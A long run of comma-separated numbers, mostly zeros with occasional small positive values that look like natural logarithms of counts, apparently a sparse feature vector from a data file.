0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 6.182084906716631, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.969813299576001, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.825453896395787, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 